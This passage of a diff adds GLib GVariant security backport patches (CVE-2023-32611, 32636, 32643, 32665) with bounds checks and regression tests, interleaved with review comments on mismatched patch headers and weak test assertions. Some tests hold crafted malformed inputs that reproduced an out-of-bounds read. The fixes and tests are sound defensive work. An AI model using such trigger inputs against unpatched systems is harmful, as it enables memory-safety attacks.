+- new = value;
++ new = g_variant_get_normal_form (value);
+
+- return g_variant_ref_sink (new);
++ g_assert (g_variant_is_trusted (new));
++
++ return g_steal_pointer (&new);
+ }
+
+ /**
+diff --git a/glib/tests/gvariant.c b/glib/tests/gvariant.c
+index 4ce0e4f..3dda08e 100644
+--- a/glib/tests/gvariant.c
++++ b/glib/tests/gvariant.c
+@@ -3834,6 +3834,29 @@ test_gv_byteswap (void)
+ g_free (string);
+ }
+
++static void
++test_gv_byteswap_non_normal_non_aligned (void)
++{
++ const guint8 data[] = { 0x02 };
++ GVariant *v = NULL;
++ GVariant *v_byteswapped = NULL;
++
++ g_test_summary ("Test that calling g_variant_byteswap() on a variant which "
++ "is in non-normal form and doesn’t need byteswapping returns "
++ "the same variant in normal form.");
++
++ v = g_variant_new_from_data (G_VARIANT_TYPE_BOOLEAN, data, sizeof (data), FALSE, NULL, NULL);
++ g_assert_false (g_variant_is_normal_form (v));
++
++ v_byteswapped = g_variant_byteswap (v);
++ g_assert_true (g_variant_is_normal_form (v_byteswapped));
++
++ g_assert_cmpvariant (v, v_byteswapped);
++
++ g_variant_unref (v);
++ g_variant_unref (v_byteswapped);
++}
++
+ static void
+ test_parser (void)
+ {
+@@ -5570,6 +5593,7 @@ main (int argc, char **argv)
+ g_test_add_func ("/gvariant/builder-memory", test_builder_memory);
+ g_test_add_func ("/gvariant/hashing", test_hashing);
+ g_test_add_func ("/gvariant/byteswap", test_gv_byteswap);
++ g_test_add_func ("/gvariant/byteswap/non-normal-non-aligned", test_gv_byteswap_non_normal_non_aligned);
+ g_test_add_func ("/gvariant/parser", test_parses);
+ g_test_add_func ("/gvariant/parser/integer-bounds", test_parser_integer_bounds);
+ g_test_add_func ("/gvariant/parser/recursion", test_parser_recursion);
+--
+2.24.4
+
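Review bot: The header of this patch file does not describe its diff. Its `From 1deacdd4…` line, its subject "gvariant-core: Consolidate construction of `GVariantSerialised`", the "This introduces no functional changes" message and the Upstream-Status link are identical to those of CVE-2023-32665-0001.patch later in this commit, and the tag reads `CVE: CVE-2023-32665`, while the body changes `g_variant_byteswap()` in glib/gvariant.c and adds `test_gv_byteswap_non_normal_non_aligned`. CVE-2023-32611-0002.patch has the same mismatch: it carries the header of the "framing offsets" commit over a body that adds a `byteswap` argument to `g_variant_deep_copy()`. Anyone auditing the backport against upstream is pointed at the wrong commits, and tooling that relies on the `CVE:` tag may not credit CVE-2023-32611 as patched. Both headers should carry the subject, hash and Upstream-Status of the upstream commits the diffs were actually taken from, with `CVE: CVE-2023-32611`.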
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32611-0002.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32611-0002.patch
new file mode 100644
index 0000000000..9167ea624f
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32611-0002.patch
@@ -0,0 +1,255 @@
+From 446e69f5edd72deb2196dee36bbaf8056caf6948 Mon Sep 17 00:00:00 2001
+From: William Manley <will@stb-tester.com>
+Date: Wed, 9 Aug 2023 10:39:34 +0000
+Subject: [PATCH] gvariant-serialiser: Factor out functions for dealing with
+ framing offsets
+
+This introduces no functional changes.
+
+Helps: #2121
+
+CVE: CVE-2023-32665
+Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/glib/-/commit/446e69f5edd72deb2196dee36bbaf8056caf6948]
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ glib/gvariant.c | 81 +++++++++++++++++++++++++++++++++----------
+ glib/tests/gvariant.c | 57 ++++++++++++++++++++++++++----
+ 2 files changed, 112 insertions(+), 26 deletions(-)
+
+diff --git a/glib/gvariant.c b/glib/gvariant.c
+index 4dbd9e8..a80c2c9 100644
+--- a/glib/gvariant.c
++++ b/glib/gvariant.c
+@@ -5788,7 +5788,8 @@ g_variant_iter_loop (GVariantIter *iter,
+
+ /* Serialised data {{{1 */
+ static GVariant *
+-g_variant_deep_copy (GVariant *value)
++g_variant_deep_copy (GVariant *value,
++ gboolean byteswap)
+ {
+ switch (g_variant_classify (value))
+ {
+@@ -5806,7 +5807,7 @@ g_variant_deep_copy (GVariant *value)
+ for (i = 0, n_children = g_variant_n_children (value); i < n_children; i++)
+ {
+ GVariant *child = g_variant_get_child_value (value, i);
+- g_variant_builder_add_value (&builder, g_variant_deep_copy (child));
++ g_variant_builder_add_value (&builder, g_variant_deep_copy (child, byteswap));
+ g_variant_unref (child);
+ }
+
+@@ -5820,28 +5821,63 @@ g_variant_deep_copy (GVariant *value)
+ return g_variant_new_byte (g_variant_get_byte (value));
+
+ case G_VARIANT_CLASS_INT16:
+- return g_variant_new_int16 (g_variant_get_int16 (value));
++ if (byteswap)
++ return g_variant_new_int16 (GUINT16_SWAP_LE_BE (g_variant_get_int16 (value)));
++ else
++ return g_variant_new_int16 (g_variant_get_int16 (value));
+
+ case G_VARIANT_CLASS_UINT16:
+- return g_variant_new_uint16 (g_variant_get_uint16 (value));
++ if (byteswap)
++ return g_variant_new_uint16 (GUINT16_SWAP_LE_BE (g_variant_get_uint16 (value)));
++ else
++ return g_variant_new_uint16 (g_variant_get_uint16 (value));
+
+ case G_VARIANT_CLASS_INT32:
+- return g_variant_new_int32 (g_variant_get_int32 (value));
++ if (byteswap)
++ return g_variant_new_int32 (GUINT32_SWAP_LE_BE (g_variant_get_int32 (value)));
++ else
++ return g_variant_new_int32 (g_variant_get_int32 (value));
+
+ case G_VARIANT_CLASS_UINT32:
+- return g_variant_new_uint32 (g_variant_get_uint32 (value));
++ if (byteswap)
++ return g_variant_new_uint32 (GUINT32_SWAP_LE_BE (g_variant_get_uint32 (value)));
++ else
++ return g_variant_new_uint32 (g_variant_get_uint32 (value));
+
+ case G_VARIANT_CLASS_INT64:
+- return g_variant_new_int64 (g_variant_get_int64 (value));
++ if (byteswap)
++ return g_variant_new_int64 (GUINT64_SWAP_LE_BE (g_variant_get_int64 (value)));
++ else
++ return g_variant_new_int64 (g_variant_get_int64 (value));
+
+ case G_VARIANT_CLASS_UINT64:
+- return g_variant_new_uint64 (g_variant_get_uint64 (value));
++ if (byteswap)
++ return g_variant_new_uint64 (GUINT64_SWAP_LE_BE (g_variant_get_uint64 (value)));
++ else
++ return g_variant_new_uint64 (g_variant_get_uint64 (value));
+
+ case G_VARIANT_CLASS_HANDLE:
+- return g_variant_new_handle (g_variant_get_handle (value));
++ if (byteswap)
++ return g_variant_new_handle (GUINT32_SWAP_LE_BE (g_variant_get_handle (value)));
++ else
++ return g_variant_new_handle (g_variant_get_handle (value));
+
+ case G_VARIANT_CLASS_DOUBLE:
+- return g_variant_new_double (g_variant_get_double (value));
++ if (byteswap)
++ {
++ /* We have to convert the double to a uint64 here using a union,
++ * because a cast will round it numerically. */
++ union
++ {
++ guint64 u64;
++ gdouble dbl;
++ } u1, u2;
++ u1.dbl = g_variant_get_double (value);
++ u2.u64 = GUINT64_SWAP_LE_BE (u1.u64);
++ return g_variant_new_double (u2.dbl);
++ }
++ else
++ return g_variant_new_double (g_variant_get_double (value));
+
+ case G_VARIANT_CLASS_STRING:
+ return g_variant_new_string (g_variant_get_string (value, NULL));
+@@ -5896,7 +5932,7 @@ g_variant_get_normal_form (GVariant *value)
+ if (g_variant_is_normal_form (value))
+ return g_variant_ref (value);
+
+- trusted = g_variant_deep_copy (value);
++ trusted = g_variant_deep_copy (value, FALSE);
+ g_assert (g_variant_is_trusted (trusted));
+
+ return g_variant_ref_sink (trusted);
+@@ -5916,6 +5952,11 @@ g_variant_get_normal_form (GVariant *value)
+ * contain multi-byte numeric data. That include strings, booleans,
+ * bytes and containers containing only these things (recursively).
+ *
++ * While this function can safely handle untrusted, non-normal data, it is
++ * recommended to check whether the input is in normal form beforehand, using
++ * g_variant_is_normal_form(), and to reject non-normal inputs if your
++ * application can be strict about what inputs it rejects.
++ *
+ * The returned value is always in normal form and is marked as trusted.
+ *
+ * Returns: (transfer full): the byteswapped form of @value
+@@ -5933,21 +5974,20 @@ g_variant_byteswap (GVariant *value)
+
+ g_variant_type_info_query (type_info, &alignment, NULL);
+
+- if (alignment)
+- /* (potentially) contains multi-byte numeric data */
++ if (alignment && g_variant_is_normal_form (value))
+ {
++ /* (potentially) contains multi-byte numeric data, but is also already in
++ * normal form so we can use a faster byteswapping codepath on the
++ * serialised data */
+ GVariantSerialised serialised = { 0, };
+- GVariant *trusted;
+ GBytes *bytes;
+
+- trusted = g_variant_get_normal_form (value);
+- serialised.type_info = g_variant_get_type_info (trusted);
+- serialised.size = g_variant_get_size (trusted);
++ serialised.type_info = g_variant_get_type_info (value);
++ serialised.size = g_variant_get_size (value);
+ serialised.data = g_malloc (serialised.size);
+ serialised.ordered_offsets_up_to = G_MAXSIZE; /* operating on the normal form */
+ serialised.checked_offsets_up_to = G_MAXSIZE;
+- g_variant_store (trusted, serialised.data);
+- g_variant_unref (trusted);
++ g_variant_store (value, serialised.data);
+
+ g_variant_serialised_byteswap (serialised);
+
+@@ -5955,6 +5995,9 @@ g_variant_byteswap (GVariant *value)
+ new = g_variant_ref_sink (g_variant_new_from_bytes (g_variant_get_type (value), bytes, TRUE));
+ g_bytes_unref (bytes);
+ }
++ else if (alignment)
++ /* (potentially) contains multi-byte numeric data */
++ new = g_variant_ref_sink (g_variant_deep_copy (value, TRUE));
+ else
+ /* contains no multi-byte data */
+ new = g_variant_get_normal_form (value);
+diff --git a/glib/tests/gvariant.c b/glib/tests/gvariant.c
+index 3dda08e..679dd40 100644
+--- a/glib/tests/gvariant.c
++++ b/glib/tests/gvariant.c
+@@ -2284,24 +2284,67 @@ serialise_tree (TreeInstance *tree,
+ static void
+ test_byteswap (void)
+ {
+- GVariantSerialised one = { 0, }, two = { 0, };
++ GVariantSerialised one = { 0, }, two = { 0, }, three = { 0, };
+ TreeInstance *tree;
+-
++ GVariant *one_variant = NULL;
++ GVariant *two_variant = NULL;
++ GVariant *two_byteswapped = NULL;
++ GVariant *three_variant = NULL;
++ GVariant *three_byteswapped = NULL;
++ guint8 *three_data_copy = NULL;
++ gsize three_size_copy = 0;
++
++ /* Write a tree out twice, once normally and once byteswapped. */
+ tree = tree_instance_new (NULL, 3);
+ serialise_tree (tree, &one);
+
++ one_variant = g_variant_new_from_data (G_VARIANT_TYPE (g_variant_type_info_get_type_string (one.type_info)),
++ one.data, one.size, FALSE, NULL, NULL);
++
+ i_am_writing_byteswapped = TRUE;
+ serialise_tree (tree, &two);
++ serialise_tree (tree, &three);
+ i_am_writing_byteswapped = FALSE;
+
+- g_variant_serialised_byteswap (two);
+-
+- g_assert_cmpmem (one.data, one.size, two.data, two.size);
+- g_assert_cmpuint (one.depth, ==, two.depth);
+-
++ /* Swap the first byteswapped one back using the function we want to test. */
++ two_variant = g_variant_new_from_data (G_VARIANT_TYPE (g_variant_type_info_get_type_string (two.type_info)),
++ two.data, two.size, FALSE, NULL, NULL);
++ two_byteswapped = g_variant_byteswap (two_variant);
++
++ /* Make the second byteswapped one non-normal (hopefully), and then byteswap
++ * it back using the function we want to test in its non-normal mode.
++ * This might not work because it’s not necessarily possible to make an
++ * arbitrary random variant non-normal. Adding a single zero byte to the end
++ * often makes something non-normal but still readable. */
++ three_size_copy = three.size + 1;
++ three_data_copy = g_malloc (three_size_copy);
++ memcpy (three_data_copy, three.data, three.size);
++ three_data_copy[three.size] = '\0';
++
++ three_variant = g_variant_new_from_data (G_VARIANT_TYPE (g_variant_type_info_get_type_string (three.type_info)),
++ three_data_copy, three_size_copy, FALSE, NULL, NULL);
++ three_byteswapped = g_variant_byteswap (three_variant);
++
++ /* Check they’re the same. We can always compare @one_variant and
++ * @two_byteswapped. We can only compare @two_byteswapped and
++ * @three_byteswapped if @two_variant and @three_variant are equal: in that
++ * case, the corruption to @three_variant was enough to make it non-normal but
++ * not enough to change its value. */
++ g_assert_cmpvariant (one_variant, two_byteswapped);
++
++ if (g_variant_equal (two_variant, three_variant))
++ g_assert_cmpvariant (two_byteswapped, three_byteswapped);
++
++ g_variant_unref (three_byteswapped);
++ g_variant_unref (three_variant);
++ g_variant_unref (two_byteswapped);
++ g_variant_unref (two_variant);
++ g_variant_unref (one_variant);
+ tree_instance_free (tree);
+ g_free (one.data);
+ g_free (two.data);
++ g_free (three.data);
++ g_free (three_data_copy);
+ }
+
+ static void
+--
+2.24.4
+
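Review bot: In `test_byteswap`, the only assertion on the non-normal input, `g_assert_cmpvariant (two_byteswapped, three_byteswapped)`, sits behind `if (g_variant_equal (two_variant, three_variant))`. On runs where the appended zero byte changes the value, the new `g_variant_deep_copy (value, TRUE)` branch of `g_variant_byteswap()` is executed but nothing about its result is checked, and the test still passes silently. The test's own comment admits the corruption "might not work", so the skipped case should at least be visible in the log, for example `else g_test_message ("three_variant changed value; non-normal byteswap result not compared");`. A deterministic non-normal fixture with multi-byte members would cover the path on every run.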
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32636.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32636.patch
new file mode 100644
index 0000000000..533142b22a
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32636.patch
@@ -0,0 +1,49 @@
+From 21a204147b16539b3eda3143b32844c49e29f4d4 Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Thu, 17 Aug 2023 11:33:49 +0000
+Subject: [PATCH] gvariant: Propagate trust when getting a child of a
+ serialised variant
+
+If a variant is trusted, that means all its children are trusted, so
+ensure that their checked offsets are set as such.
+
+This allows a lot of the offset table checks to be avoided when getting
+children from trusted serialised tuples, which speeds things up.
+
+No unit test is included because this is just a performance fix. If
+there are other slownesses, or regressions, in serialised `GVariant`
+performance, the fuzzing setup will catch them like it did this one.
+
+This change does reduce the time to run the oss-fuzz reproducer from 80s
+to about 0.7s on my machine.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+
+Fixes: #2841
+oss-fuzz#54314
+
+CVE: CVE-2023-32636
+Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/glib/-/commit/21a204147b16539b3eda3143b32844c49e29f4d4]
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ glib/gvariant-core.c | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/glib/gvariant-core.c b/glib/gvariant-core.c
+index 1b9d5cc..ed57c70 100644
+--- a/glib/gvariant-core.c
++++ b/glib/gvariant-core.c
+@@ -1173,8 +1173,8 @@ g_variant_get_child_value (GVariant *value,
+ child->contents.serialised.bytes =
+ g_bytes_ref (value->contents.serialised.bytes);
+ child->contents.serialised.data = s_child.data;
+- child->contents.serialised.ordered_offsets_up_to = s_child.ordered_offsets_up_to;
+- child->contents.serialised.checked_offsets_up_to = s_child.checked_offsets_up_to;
++ child->contents.serialised.ordered_offsets_up_to = (value->state & STATE_TRUSTED) ? G_MAXSIZE : s_child.ordered_offsets_up_to;
++ child->contents.serialised.checked_offsets_up_to = (value->state & STATE_TRUSTED) ? G_MAXSIZE : s_child.checked_offsets_up_to;
+
+ return child;
+ }
+--
+2.24.4
+
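Review bot: The two new assignments in `g_variant_get_child_value` discard the serialiser's per-child `ordered_offsets_up_to` and `checked_offsets_up_to` in favour of `G_MAXSIZE` whenever the parent has `STATE_TRUSTED`, and nothing at that spot records why skipping the checks is safe. A comment such as `/* A trusted parent implies trusted children, so their offset tables need no further checking. */` would keep the reasoning from the commit message next to the code. Reading `value->state & STATE_TRUSTED` once into a local would also replace the two duplicated long ternaries. The shortcut is only sound if `STATE_TRUSTED` is never set on data that has not been validated, which cannot be confirmed from this hunk; the function body starts outside it.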
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32643.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32643.patch
new file mode 100644
index 0000000000..9c0867bf5f
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32643.patch
@@ -0,0 +1,154 @@
+From 78da5faccb3e065116b75b3ff87ff55381da6c76 Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Thu, 17 Aug 2023 11:24:43 +0000
+Subject: [PATCH] gvariant: Check offset table doesn't fall outside variant
+ bounds
+
+When dereferencing the first entry in the offset table for a tuple,
+check that it doesn’t fall outside the bounds of the variant first.
+
+This prevents an out-of-bounds read from some non-normal tuples.
+
+This bug was introduced in commit 73d0aa81c2575a5c9ae77d.
+
+Includes a unit test, although the test will likely only catch the
+original bug if run with asan enabled.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+
+Fixes: #2840
+oss-fuzz#54302
+
+CVE: CVE-2023-32643
+Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/glib/-/commit/78da5faccb3e065116b75b3ff87ff55381da6c76]
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ glib/gvariant-serialiser.c | 12 ++++++--
+ glib/tests/gvariant.c | 63 ++++++++++++++++++++++++++++++++++++++
+ 2 files changed, 72 insertions(+), 3 deletions(-)
+
+diff --git a/glib/gvariant-serialiser.c b/glib/gvariant-serialiser.c
+index 5aa2cbc..4e50ed7 100644
+--- a/glib/gvariant-serialiser.c
++++ b/glib/gvariant-serialiser.c
+@@ -979,7 +979,8 @@ gvs_tuple_get_member_bounds (GVariantSerialised value,
+
+ member_info = g_variant_type_info_member_info (value.type_info, index_);
+
+- if (member_info->i + 1)
++ if (member_info->i + 1 &&
++ offset_size * (member_info->i + 1) <= value.size)
+ member_start = gvs_read_unaligned_le (value.data + value.size -
+ offset_size * (member_info->i + 1),
+ offset_size);
+@@ -990,7 +991,8 @@ gvs_tuple_get_member_bounds (GVariantSerialised value,
+ member_start &= member_info->b;
+ member_start |= member_info->c;
+
+- if (member_info->ending_type == G_VARIANT_MEMBER_ENDING_LAST)
++ if (member_info->ending_type == G_VARIANT_MEMBER_ENDING_LAST &&
++ offset_size * (member_info->i + 1) <= value.size)
+ member_end = value.size - offset_size * (member_info->i + 1);
+
+ else if (member_info->ending_type == G_VARIANT_MEMBER_ENDING_FIXED)
+@@ -1001,11 +1003,15 @@ gvs_tuple_get_member_bounds (GVariantSerialised value,
+ member_end = member_start + fixed_size;
+ }
+
+- else /* G_VARIANT_MEMBER_ENDING_OFFSET */
++ else if (member_info->ending_type == G_VARIANT_MEMBER_ENDING_OFFSET &&
++ offset_size * (member_info->i + 2) <= value.size)
+ member_end = gvs_read_unaligned_le (value.data + value.size -
+ offset_size * (member_info->i + 2),
+ offset_size);
+
++ else /* invalid */
++ member_end = G_MAXSIZE;
++
+ if (out_member_start != NULL)
+ *out_member_start = member_start;
+ if (out_member_end != NULL)
+diff --git a/glib/tests/gvariant.c b/glib/tests/gvariant.c
+index 679dd40..2eca8be 100644
+--- a/glib/tests/gvariant.c
++++ b/glib/tests/gvariant.c
+@@ -5432,6 +5432,67 @@ test_normal_checking_tuple_offsets4 (void)
+ g_variant_unref (variant);
+ }
+
++/* This is a regression test that dereferencing the first element in the offset
++ * table doesn’t dereference memory before the start of the GVariant. The first
++ * element in the offset table gives the offset of the final member in the
++ * tuple (the offset table is stored in reverse), and the position of this final
++ * member is needed to check that none of the tuple members overlap with the
++ * offset table
++ *
++ * See https://gitlab.gnome.org/GNOME/glib/-/issues/2840 */
++static void
++test_normal_checking_tuple_offsets5 (void)
++{
++ /* A tuple of type (sss) in normal form would have an offset table with two
++ * entries:
++ * - The first entry (lowest index in the table) gives the offset of the
++ * third `s` in the tuple, as the offset table is reversed compared to the
++ * tuple members.
++ * - The second entry (highest index in the table) gives the offset of the
++ * second `s` in the tuple.
++ * - The offset of the first `s` in the tuple is always 0.
++ *
++ * See §2.5.4 (Structures) of the GVariant specification for details, noting
++ * that the table is only layed out this way because all three members of the
++ * tuple have non-fixed sizes.
++ *
++ * It’s not clear whether the 0xaa data of this variant is part of the strings
++ * in the tuple, or part of the offset table. It doesn’t really matter. This
++ * is a regression test to check that the code to validate the offset table
++ * doesn’t unconditionally try to access the first entry in the offset table
++ * by subtracting the table size from the end of the GVariant data.
++ *
++ * In this non-normal case, that would result in an address off the start of
++ * the GVariant data, and an out-of-bounds read, because the GVariant is one
++ * byte long, but the offset table is calculated as two bytes long (with 1B
++ * sized entries) from the tuple’s type.
++ */
++ const GVariantType *data_type = G_VARIANT_TYPE ("(sss)");
++ const guint8 data[] = { 0xaa };
++ gsize size = sizeof (data);
++ GVariant *variant = NULL;
++ GVariant *normal_variant = NULL;
++ GVariant *expected = NULL;
++
++ g_test_bug ("https://gitlab.gnome.org/GNOME/glib/-/issues/2840");
++
++ variant = g_variant_new_from_data (data_type, data, size, FALSE, NULL, NULL);
++ g_assert_nonnull (variant);
++
++ g_assert_false (g_variant_is_normal_form (variant));
++
++ normal_variant = g_variant_get_normal_form (variant);
++ g_assert_nonnull (normal_variant);
++
++ expected = g_variant_new_parsed ("('', '', '')");
++ g_assert_cmpvariant (expected, variant);
++ g_assert_cmpvariant (expected, normal_variant);
++
++ g_variant_unref (expected);
++ g_variant_unref (normal_variant);
++ g_variant_unref (variant);
++}
++
+ /* Test that an otherwise-valid serialised GVariant is considered non-normal if
+ * its offset table entries are too wide.
+ *
+@@ -5680,6 +5741,8 @@ main (int argc, char **argv)
+ test_normal_checking_tuple_offsets3);
+ g_test_add_func ("/gvariant/normal-checking/tuple-offsets4",
+ test_normal_checking_tuple_offsets4);
++ g_test_add_func ("/gvariant/normal-checking/tuple-offsets5",
++ test_normal_checking_tuple_offsets5);
+ g_test_add_func ("/gvariant/normal-checking/tuple-offsets/minimal-sized",
+ test_normal_checking_tuple_offsets_minimal_sized);
+ g_test_add_func ("/gvariant/normal-checking/empty-object-path",
+--
+2.24.4
+
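Review bot: In `gvs_tuple_get_member_bounds`, the new final `else` sets `member_end = G_MAXSIZE` as the only signal that the offset table does not fit inside `value.size`, and the function has no return value or comment telling callers what that means. The fix therefore depends on every caller rejecting `member_end > value.size`, and those callers are not visible in the hunk. I would state the contract at the branch, e.g. `/* invalid: offset table lies outside the data; callers must reject member_end > value.size */`. The same bound `offset_size * (member_info->i + 1) <= value.size` is now written out twice, plus a `+ 2` variant, so a named local would make the three guards easier to compare. The fallback taken for `member_start` when the first guard fails lies between the hunks and should be checked for the same property.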
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0001.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0001.patch
new file mode 100644
index 0000000000..9fc58341cb
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0001.patch
@@ -0,0 +1,103 @@
+From 1deacdd4e8e35a5cf1417918ca4f6b0afa6409b1 Mon Sep 17 00:00:00 2001
+From: William Manley <will@stb-tester.com>
+Date: Wed, 9 Aug 2023 10:04:49 +0000
+Subject: [PATCH] gvariant-core: Consolidate construction of
+ `GVariantSerialised`
+
+So I only need to change it in one place.
+
+This introduces no functional changes.
+
+Helps: #2121
+
+CVE: CVE-2023-32665
+Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/glib/-/commit/1deacdd4e8e35a5cf1417918ca4f6b0afa6409b1]
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ glib/gvariant-core.c | 49 ++++++++++++++++++++++----------------------
+ 1 file changed, 25 insertions(+), 24 deletions(-)
+
+diff --git a/glib/gvariant-core.c b/glib/gvariant-core.c
+index 9397573..aa0e0a0 100644
+--- a/glib/gvariant-core.c
++++ b/glib/gvariant-core.c
+@@ -349,6 +349,27 @@ g_variant_ensure_size (GVariant *value)
+ }
+ }
+
++/* < private >
++ * g_variant_to_serialised:
++ * @value: a #GVariant
++ *
++ * Gets a GVariantSerialised for a GVariant in state STATE_SERIALISED.
++ */
++inline static GVariantSerialised
++g_variant_to_serialised (GVariant *value)
++{
++ g_assert (value->state & STATE_SERIALISED);
++ {
++ GVariantSerialised serialised = {
++ value->type_info,
++ (gpointer) value->contents.serialised.data,
++ value->size,
++ value->depth,
++ };
++ return serialised;
++ }
++}
++
+ /* < private >
+ * g_variant_serialise:
+ * @value: a #GVariant
+@@ -991,16 +1012,8 @@ g_variant_n_children (GVariant *value)
+ g_variant_lock (value);
+
+ if (value->state & STATE_SERIALISED)
+- {
+- GVariantSerialised serialised = {
+- value->type_info,
+- (gpointer) value->contents.serialised.data,
+- value->size,
+- value->depth,
+- };
+-
+- n_children = g_variant_serialised_n_children (serialised);
+- }
++ n_children = g_variant_serialised_n_children (
++ g_variant_to_serialised (value));
+ else
+ n_children = value->contents.tree.n_children;
+
+@@ -1061,12 +1074,7 @@ g_variant_get_child_value (GVariant *value,
+ }
+
+ {
+- GVariantSerialised serialised = {
+- value->type_info,
+- (gpointer) value->contents.serialised.data,
+- value->size,
+- value->depth,
+- };
++ GVariantSerialised serialised = g_variant_to_serialised (value);
+ GVariantSerialised s_child;
+ GVariant *child;
+
+@@ -1179,14 +1187,7 @@ g_variant_is_normal_form (GVariant *value)
+
+ if (value->state & STATE_SERIALISED)
+ {
+- GVariantSerialised serialised = {
+- value->type_info,
+- (gpointer) value->contents.serialised.data,
+- value->size,
+- value->depth
+- };
+-
+- if (g_variant_serialised_is_normal (serialised))
++ if (g_variant_serialised_is_normal (g_variant_to_serialised (value)))
+ value->state |= STATE_TRUSTED;
+ }
+ else
+--
+2.24.4
+
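Review bot: The new helper `g_variant_to_serialised` enforces its precondition only with `g_assert (value->state & STATE_SERIALISED)`, which is compiled out when GLib is built with `G_DISABLE_ASSERT`, and its doc comment does not state the requirement as a caller obligation. Of the three call sites, `g_variant_n_children` and `g_variant_is_normal_form` visibly test `STATE_SERIALISED` first, but the guard for the `g_variant_get_child_value` call lies outside the hunk. I would add a line to the comment such as `* @value must already be in serialised form; this is checked only by g_assert().` so that a later caller does not read `contents.serialised.data` from a tree-form variant. The positional initialiser also leaves any `GVariantSerialised` members after `depth` zeroed, which is worth a word in the comment if the struct has gained fields on this branch.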
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0002.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0002.patch
new file mode 100644
index 0000000000..0e96b8d457
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0002.patch
@@ -0,0 +1,210 @@
+From 446e69f5edd72deb2196dee36bbaf8056caf6948 Mon Sep 17 00:00:00 2001
+From: William Manley <will@stb-tester.com>
+Date: Wed, 9 Aug 2023 10:39:34 +0000
+Subject: [PATCH] gvariant-serialiser: Factor out functions for dealing with
+ framing offsets
+
+This introduces no functional changes.
+
+Helps: #2121
+
+CVE: CVE-2023-32665
+Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/glib/-/commit/446e69f5edd72deb2196dee36bbaf8056caf6948]
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ glib/gvariant-serialiser.c | 108 +++++++++++++++++++------------------
+ 1 file changed, 57 insertions(+), 51 deletions(-)
+
+diff --git a/glib/gvariant-serialiser.c b/glib/gvariant-serialiser.c
+index 83e9d85..c7c2114 100644
+--- a/glib/gvariant-serialiser.c
++++ b/glib/gvariant-serialiser.c
+@@ -633,30 +633,62 @@ gvs_calculate_total_size (gsize body_size,
+ return body_size + 8 * offsets;
+ }
+
++struct Offsets
++{
++ gsize data_size;
++
++ guchar *array;
++ gsize length;
++ guint offset_size;
++
++ gboolean is_normal;
++};
++
+ static gsize
+-gvs_variable_sized_array_n_children (GVariantSerialised value)
++gvs_offsets_get_offset_n (struct Offsets *offsets,
++ gsize n)
++{
++ return gvs_read_unaligned_le (
++ offsets->array + (offsets->offset_size * n), offsets->offset_size);
++}
++
++static struct Offsets
++gvs_variable_sized_array_get_frame_offsets (GVariantSerialised value)
+ {
++ struct Offsets out = { 0, };
+ gsize offsets_array_size;
+- gsize offset_size;
+ gsize last_end;
+
+ if (value.size == 0)
+- return 0;
+-
+- offset_size = gvs_get_offset_size (value.size);
++ {
++ out.is_normal = TRUE;
++ return out;
++ }
+
+- last_end = gvs_read_unaligned_le (value.data + value.size -
+- offset_size, offset_size);
++ out.offset_size = gvs_get_offset_size (value.size);
++ last_end = gvs_read_unaligned_le (value.data + value.size - out.offset_size,
++ out.offset_size);
+
+ if (last_end > value.size)
+- return 0;
++ return out; /* offsets not normal */
+
+ offsets_array_size = value.size - last_end;
+
+- if (offsets_array_size % offset_size)
+- return 0;
++ if (offsets_array_size % out.offset_size)
++ return out; /* offsets not normal */
++
++ out.data_size = last_end;
++ out.array = value.data + last_end;
++ out.length = offsets_array_size / out.offset_size;
++ out.is_normal = TRUE;
+
+- return offsets_array_size / offset_size;
++ return out;
++}
++
++static gsize
++gvs_variable_sized_array_n_children (GVariantSerialised value)
++{
++ return gvs_variable_sized_array_get_frame_offsets (value).length;
+ }
+
+ static GVariantSerialised
+@@ -664,8 +696,9 @@ gvs_variable_sized_array_get_child (GVariantSerialised value,
+ gsize index_)
+ {
+ GVariantSerialised child = { 0, };
+- gsize offset_size;
+- gsize last_end;
++
++ struct Offsets offsets = gvs_variable_sized_array_get_frame_offsets (value);
++
+ gsize start;
+ gsize end;
+
+@@ -673,18 +706,11 @@ gvs_variable_sized_array_get_child (GVariantSerialised value,
+ g_variant_type_info_ref (child.type_info);
+ child.depth = value.depth + 1;
+
+- offset_size = gvs_get_offset_size (value.size);
+-
+- last_end = gvs_read_unaligned_le (value.data + value.size -
+- offset_size, offset_size);
+-
+ if (index_ > 0)
+ {
+ guint alignment;
+
+- start = gvs_read_unaligned_le (value.data + last_end +
+- (offset_size * (index_ - 1)),
+- offset_size);
++ start = gvs_offsets_get_offset_n (&offsets, index_ - 1);
+
+ g_variant_type_info_query (child.type_info, &alignment, NULL);
+ start += (-start) & alignment;
